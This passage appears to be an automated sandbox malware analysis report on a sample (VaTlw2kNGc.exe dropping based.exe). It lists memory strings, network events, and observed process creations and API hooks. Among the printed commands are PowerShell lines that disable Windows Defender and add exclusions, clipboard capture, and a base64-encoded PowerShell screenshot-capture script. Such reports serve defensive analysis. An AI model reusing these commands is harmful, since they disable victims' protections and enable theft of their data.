https://www.mozilla.org
                                  Source: based.exe, 00000008.00000003.1792926439.00000273ED855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                                  Source: based.exe, 00000008.00000003.1854346088.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868467332.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                                  Source: based.exe, 00000008.00000003.1792926439.00000273ED855000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1809552854.00000273ED8F2000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1819669283.00000273ED8F3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1784489237.00000273ED8F8000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1793559715.00000273ED8F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                                  Source: based.exe, 00000008.00000003.1854346088.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868467332.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                                  Source: based.exe, 00000008.00000003.1792926439.00000273ED855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                                  Source: based.exe, 00000008.00000003.1854346088.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868467332.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                                  Source: based.exe, 00000008.00000003.1792926439.00000273ED855000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1854346088.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868467332.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                                  Source: based.exe, 00000008.00000003.2318133262.00000273ED7B2000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1792926439.00000273ED7B4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2380159410.00000273ED7B2000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1875652146.00000273ED7AD000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2368748982.00000273ED7B1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2372168920.00000273ED7B1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1911311417.00000273ED7B0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1820004509.00000273ED7B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
                                  Source: based.exe, 00000008.00000003.1792926439.00000273ED811000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
                                  Source: based.exe, 00000008.00000003.1854346088.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868467332.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                                  Source: based.exe, 00000008.00000002.2383767795.00000273EE538000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
                                  Source: based.exe, 00000008.00000002.2381451502.00000273EDC84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
                                  Source: based.exe, 00000006.00000003.1734194548.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2581670053.00007FFDFBAA6000.00000004.00000001.01000000.0000001D.sdmp, based.exe, 00000008.00000002.2529240083.00007FFDFB742000.00000004.00000001.01000000.0000001E.sdmpString found in binary or memory: https://www.openssl.org/H
                                  Source: VaTlw2kNGc.exe, 00000000.00000003.1701929834.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726830017.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1729314570.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0205/
                                  Source: VaTlw2kNGc.exe, 00000001.00000002.1717549435.000001A220AD0000.00000004.00001000.00020000.00000000.sdmp, hacn.exe, 00000007.00000002.1749563307.000001A052178000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2378472989.00000273ED090000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
                                  Source: based.exe, 00000008.00000003.2319649761.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1852165022.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1874644333.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379386136.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2371538109.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868913203.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2319744738.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2370626302.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1787886162.00000273ED46D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
                                  Source: based.exe, 00000008.00000002.2381451502.00000273EDC38000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
                                  Source: based.exe, 00000008.00000002.2381451502.00000273EDCB4000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2381451502.00000273EDC84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
                                  Source: based.exe, 00000008.00000003.1909237453.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2319649761.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1852165022.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379742963.00000273ED760000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1874644333.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379386136.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2371538109.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868913203.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2319744738.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1789613343.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376496051.00000273ED40E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2370626302.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1869157083.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1787886162.00000273ED46D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379225122.00000273ED412000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

                                  Spam, unwanted Advertisements and Ransom Demands

                                  barindex
                                  Source: C:\ProgramData\Microsoft\based.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? \Common Files\Desktop\DVWHKMNFNN.pngJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? \Common Files\Desktop\DVWHKMNFNN.pngJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? \Common Files\Desktop\KZWFNRXYKI.pngJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? \Common Files\Desktop\KATAXZVCPS.pdfJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? \Common Files\Desktop\KATAXZVCPS.pdfJump to behavior
                                  Source: cmd.exeProcess created: 44

                                  System Summary

                                  barindex
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: Commandline size = 3647
                                  Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: Commandline size = 3647Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
                                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr'
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr'
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00000202B6E2253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,6_2_00000202B6E2253C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00000202B6E228C8 NtEnumerateValueKey,NtEnumerateValueKey,6_2_00000202B6E228C8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00000202B6E22B2C NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,6_2_00000202B6E22B2C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00000273EE642244 GetProcessIdOfThread,GetCurrentProcessId,CreateFileW,WriteFile,ReadFile,CloseHandle,NtResumeThread,8_2_00000273EE642244
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00000273EE642B2C NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,8_2_00000273EE642B2C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00000273EE6427FC NtEnumerateKey,NtEnumerateKey,8_2_00000273EE6427FC
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00000273EE64202C NtQuerySystemInformation,StrCmpNIW,8_2_00000273EE64202C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00000273EE6428C8 NtEnumerateValueKey,NtEnumerateValueKey,8_2_00000273EE6428C8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00000273EE64253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,8_2_00000273EE64253C
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_00927FD3: _wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,4_2_00927FD3
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSCF38C3B75506F4C2796D96D17B23CB45.TMP
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exe
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSCF38C3B75506F4C2796D96D17B23CB45.TMP
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691C5C740_2_00007FF7691C5C74
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691BFBD80_2_00007FF7691BFBD8
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691A10000_2_00007FF7691A1000
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691C8A380_2_00007FF7691C8A38
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691B12800_2_00007FF7691B1280
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691B0A600_2_00007FF7691B0A60
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691B7AAC0_2_00007FF7691B7AAC
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691C518C0_2_00007FF7691C518C
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691B91B00_2_00007FF7691B91B0
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691BD2000_2_00007FF7691BD200
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691B14840_2_00007FF7691B1484
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691B0C640_2_00007FF7691B0C64
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691B2CC40_2_00007FF7691B2CC4
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691A8B200_2_00007FF7691A8B20
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691C0B840_2_00007FF7691C0B84
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691C33BC0_2_00007FF7691C33BC
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691B73F40_2_00007FF7691B73F4
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691B0E700_2_00007FF7691B0E70
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691C4F100_2_00007FF7691C4F10
